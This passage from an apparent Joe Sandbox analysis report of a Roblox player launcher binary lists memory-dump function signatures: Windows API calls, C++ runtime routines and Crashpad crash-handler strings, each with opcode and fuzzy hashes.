              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: DebugForceTerminateOnRbxCrash$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-245747847
              • Opcode ID: f1be2804f1691c22022c6c7ead319f531bbd09277f333bc02df58a65ed501aab
              • Instruction ID: e2cca825bf138ce2397cfd3a09de0f63ecf0f578632e4a6364b6f5e4d4f42f4b
              • Opcode Fuzzy Hash: f1be2804f1691c22022c6c7ead319f531bbd09277f333bc02df58a65ed501aab
              • Instruction Fuzzy Hash: 4151BD75600204DFCB14CF58C940BA9B7E5FF59318F2481A9EA55DB3A2CB75ED42CB80
              APIs
              • std::locale::_Init.LIBCPMT ref: 00719F6C
              • std::ios_base::failure::failure.LIBCPMT ref: 0071A046
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Initstd::ios_base::failure::failurestd::locale::_
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2160282220-1866435925
              • Opcode ID: d5b871843206824a6d5d5fb45d80de2bd9a8a3d207d4755021b18f94f10d5d34
              • Instruction ID: fbe7c1df26045d67e4f90a1cd7177eb363c61191b6dda98b7ae2dd6fd46e2730
              • Opcode Fuzzy Hash: d5b871843206824a6d5d5fb45d80de2bd9a8a3d207d4755021b18f94f10d5d34
              • Instruction Fuzzy Hash: E05189B0A00745DFEB20CF59C598B9ABBF4BF04304F04852DE9468B781D7B9E949CB91
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: 6bcf940a42e6495bcd7605effa0bb62e48d7d756b904cbb2e7d84cf1780d1e6a
              • Instruction ID: 4f5a26ffdd05eea8a03802bc7c7f2d34bc553024949c9ff620a517839d6db658
              • Opcode Fuzzy Hash: 6bcf940a42e6495bcd7605effa0bb62e48d7d756b904cbb2e7d84cf1780d1e6a
              • Instruction Fuzzy Hash: A611E672E40A18ABDB20DA58CD47F9BB3ECAF84314F044934F911E3291E768ED018B91
              APIs
                • Part of subcall function 00A28D30: EnterCriticalSection.KERNEL32(?,008B1859,?,00000000,?,74DEE010), ref: 00A28D31
              • SetEvent.KERNEL32(?), ref: 008B0D9F
              • GetLastError.KERNEL32(SetEvent), ref: 008B0DAE
              Strings
              • ../../../util/win/exception_handler_server.cc, xrefs: 008B0DBB
              • void __stdcall crashpad::ExceptionHandlerServer::OnNonCrashDumpEvent(void *,unsigned char), xrefs: 008B0DC0
              • SetEvent, xrefs: 008B0DA9
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CriticalEnterErrorEventLastSection
              • String ID: ../../../util/win/exception_handler_server.cc$SetEvent$void __stdcall crashpad::ExceptionHandlerServer::OnNonCrashDumpEvent(void *,unsigned char)
              • API String ID: 4239446257-2426545814
              • Opcode ID: 951def90d9fce26675478aaeff9d84ac901f883a959613a15d50009d5d552fd8
              • Instruction ID: a7ca9507f91fe3ef4d24d838f0f0ab246d6d7a2d20fd3842412e4c7c70ae09e0
              • Opcode Fuzzy Hash: 951def90d9fce26675478aaeff9d84ac901f883a959613a15d50009d5d552fd8
              • Instruction Fuzzy Hash: B301C031200218BBDB00BBA9EE46F9AB725FF04704F400124FA05929A2DB76BD74CB91
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2912923C,?,?,00000000,00A3D7C8,000000FF,?,00A140E1,00000002,?,00A140B5,00A05409), ref: 00A14143
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A14155
              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00A3D7C8,000000FF,?,00A140E1,00000002,?,00A140B5,00A05409), ref: 00A14177
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 32219f64e39d039cae0c6341bf9f8f7821ae3fd05ed12331de6c025d75b9ca61
              • Instruction ID: 9ae7b31cec19d03e35d8eac1b69eac6aef32e6d5a7a8517c8a5557f6bd46480e
              • Opcode Fuzzy Hash: 32219f64e39d039cae0c6341bf9f8f7821ae3fd05ed12331de6c025d75b9ca61
              • Instruction Fuzzy Hash: 5001D679914669FFDB128F94DC05FEEB7F8FB49B11F000625F811A22A0DBB59981CA90
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 007159A7
              • std::_Lockit::_Lockit.LIBCPMT ref: 007159C5
              • std::_Lockit::~_Lockit.LIBCPMT ref: 007159E5
              • std::_Facet_Register.LIBCPMT ref: 00715A9C
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715AB4
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
              • String ID:
              • API String ID: 459529453-0
              • Opcode ID: a655cd1a5dd71d238e19efed489e6cfaeef6bfa2c9be03eefd7efa258dbcd38d
              • Instruction ID: ef10b5cdb0aeafae9471710cb09b8e6695705ecab08b9824deeb66b250c4fcb4
              • Opcode Fuzzy Hash: a655cd1a5dd71d238e19efed489e6cfaeef6bfa2c9be03eefd7efa258dbcd38d
              • Instruction Fuzzy Hash: C4418171A40655DFCB29CF58C4C1BAEBBA4FF84750F158259E806AB382D734AD81CBD1
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
              • std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
              • std::_Facet_Register.LIBCPMT ref: 00741D2C
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
              • String ID:
              • API String ID: 459529453-0
              • Opcode ID: 3dfe1d36ed8bc667921e72a3163ffcbe92b618f1737cff5c3d0c2d2aea1b2966
              • Instruction ID: c8f19d2158f73521985917d9d32a9f2e9c990d38056fdca6a9fe82b98bf8bf5b
              • Opcode Fuzzy Hash: 3dfe1d36ed8bc667921e72a3163ffcbe92b618f1737cff5c3d0c2d2aea1b2966
              • Instruction Fuzzy Hash: 2541DF71A40254DBCB21EF58C880BAEB7B4FB44710F554169E806AB392D734ED81CFE1
              APIs
              • GetProcessHeap.KERNEL32(00000000,?,?,00771C41,?,?), ref: 0075E31F
              • HeapFree.KERNEL32(00000000,00000000,?,?,00771C41,?,?), ref: 0075E329
              • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,00771C41,?,?), ref: 0075E34B
              • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00771C41,?,?), ref: 0075E352
              • GetProcessHeap.KERNEL32(?,00000000,?,?,00771C41,?,?), ref: 0075E3A9
              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00771C41,?,?), ref: 0075E3B3
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Heap$Process$Free$Alloc
              • String ID:
              • API String ID: 3689955550-0
              • Opcode ID: 2cc85f565115aff06e0d188a9d55530b8ebbf6e0805a7d020fb43f9bb0d21c0b
              • Instruction ID: a8471228ba8122a96dc04fefa7a92203d304e440410f5066d7b5b4c5b6f27996
              • Opcode Fuzzy Hash: 2cc85f565115aff06e0d188a9d55530b8ebbf6e0805a7d020fb43f9bb0d21c0b
              • Instruction Fuzzy Hash: 6321D77A2013159BEB149FA9DC44BAAFB68FF55332F140219FD15CB2A0D7B59805CBA0
              APIs
              • GetCurrentProcessId.KERNEL32(?,?,?,?), ref: 00A28519
              • GetCurrentThreadId.KERNEL32 ref: 00A28521
              • GetLocalTime.KERNEL32(?,?,0000003A,?,0000003A), ref: 00A2856B
                • Part of subcall function 008A8610: std::ios_base::failure::failure.LIBCPMT ref: 008A874B
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Current$LocalProcessThreadTimestd::ios_base::failure::failure
              • String ID: VERBOSE
              • API String ID: 1305572937-500491588
              • Opcode ID: cb8b4a782d0663ddc1699b26442a4654f3ff5f2d8c9312d1904bb0b2727bf588
              • Instruction ID: 2c2dc8ad989c525e4f7ffa3078151f4f6541d80a8fc248355118e88e6c04fe2a
              • Opcode Fuzzy Hash: cb8b4a782d0663ddc1699b26442a4654f3ff5f2d8c9312d1904bb0b2727bf588
              • Instruction Fuzzy Hash: 9EE1F830A00214AFDF15DFA8DC49FAEB7B5EF89310F1445A8F5099B292DF359A40CB51
              APIs
              • FindResourceW.KERNEL32(00000000,?,00000006), ref: 0073948E
                • Part of subcall function 0071E0F0: GetLastError.KERNEL32(0073CD66,00B314CC,0073CD66,?,0073CD66,80004005), ref: 0071E110
                • Part of subcall function 007397A0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 007397FB
                • Part of subcall function 007397A0: VerSetConditionMask.KERNEL32(00000000), ref: 007397FF
                • Part of subcall function 007397A0: VerSetConditionMask.KERNEL32(00000000), ref: 00739803
                • Part of subcall function 007397A0: VerifyVersionInfoW.KERNEL32(?,00000023,00000000), ref: 0073982A
              • GetLastError.KERNEL32(?,00000000), ref: 007395FB
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
